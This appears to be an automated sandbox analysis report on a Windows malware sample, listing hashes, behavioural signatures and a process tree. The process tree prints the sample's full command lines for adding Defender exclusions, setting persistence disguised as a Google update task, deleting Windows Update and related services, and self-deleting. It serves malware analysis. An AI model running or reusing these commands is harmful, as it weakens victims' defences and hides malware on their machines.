Analysis
-
max time kernel
90s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2022 09:59
Static task
static1
Behavioral task
behavioral1
Sample
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe
Resource
win10v2004-20220812-en
General
-
Target
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe
-
Size
3.6MB
-
MD5
d0525e69e54066d5b3764acefd16a754
-
SHA1
513304e7eca83acedad4655a135a6f4c2c1f4aed
-
SHA256
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce
-
SHA512
b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03
-
SSDEEP
98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exedescription pid Process procid_target PID 4816 created 968 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 27 PID 4816 created 968 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 27 PID 4816 created 968 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 27 PID 4816 created 968 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 27 -
Drops file in Drivers directory 1 IoCs
Processes:
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exedescription ioc Process File created C:\Windows\System32\drivers\etc\hosts d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe -
Stops running service(s) 3 TTPs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid Process 3728 sc.exe 1084 sc.exe 2052 sc.exe 1144 sc.exe 4504 sc.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exepowershell.exepowershell.exepid Process 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4152 powershell.exe 4152 powershell.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 3052 powershell.exe 3052 powershell.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe 4816 d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid Process Token: SeDebugPrivilege 4152 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeShutdownPrivilege 4060 powercfg.exe Token: SeCreatePagefilePrivilege 4060 powercfg.exe Token: SeShutdownPrivilege 4264 powercfg.exe Token: SeCreatePagefilePrivilege 4264 powercfg.exe Token: SeShutdownPrivilege 3816 powercfg.exe Token: SeCreatePagefilePrivilege 3816 powercfg.exe Token: SeShutdownPrivilege 4568 powercfg.exe Token: SeCreatePagefilePrivilege 4568 powercfg.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe Token: 34 3052 powershell.exe Token: 35 3052 powershell.exe Token: 36 3052 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe Token: 34 3052 powershell.exe Token: 35 3052 powershell.exe Token: 36 3052 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.execmd.execmd.exedescription pid Process procid_target PID 4432 wrote to memory of 3728 4432 cmd.exe 91 PID 4432 wrote to memory of 3728 4432 cmd.exe 91 PID 5076 wrote to memory of 4060 5076 cmd.exe 92 PID 5076 wrote to memory of 4060 5076 cmd.exe 92 PID 4432 wrote to memory of 1084 4432 cmd.exe 93 PID 4432 wrote to memory of 1084 4432 cmd.exe 93 PID 5076 wrote to memory of 4264 5076 cmd.exe 94 PID 5076 wrote to memory of 4264 5076 cmd.exe 94 PID 5076 wrote to memory of 3816 5076 cmd.exe 95 PID 5076 wrote to memory of 3816 5076 cmd.exe 95 PID 4432 wrote to memory of 2052 4432 cmd.exe 96 PID 4432 wrote to memory of 2052 4432 cmd.exe 96 PID 5076 wrote to memory of 4568 5076 cmd.exe 97 PID 5076 wrote to memory of 4568 5076 cmd.exe 97 PID 4432 wrote to memory of 1144 4432 cmd.exe 98 PID 4432 wrote to memory of 1144 4432 cmd.exe 98 PID 4432 wrote to memory of 4504 4432 cmd.exe 99 PID 4432 wrote to memory of 4504 4432 cmd.exe 99 PID 4432 wrote to memory of 4672 4432 cmd.exe 100 PID 4432 wrote to memory of 4672 4432 cmd.exe 100 PID 4432 wrote to memory of 2316 4432 cmd.exe 101 PID 4432 wrote to memory of 2316 4432 cmd.exe 101 PID 4432 wrote to memory of 1340 4432 cmd.exe 102 PID 4432 wrote to memory of 1340 4432 cmd.exe 102 PID 4432 wrote to memory of 4136 4432 cmd.exe 103 PID 4432 wrote to memory of 4136 4432 cmd.exe 103 PID 4432 wrote to memory of 1704 4432 cmd.exe 104 PID 4432 wrote to memory of 1704 4432 cmd.exe 104 PID 784 wrote to memory of 4400 784 cmd.exe 107 PID 784 wrote to memory of 4400 784 cmd.exe 107
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe"C:\Users\Admin\AppData\Local\Temp\d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:4816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3728
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1084
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2052
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1144
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4672
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2316
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1340
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4136
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4400
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c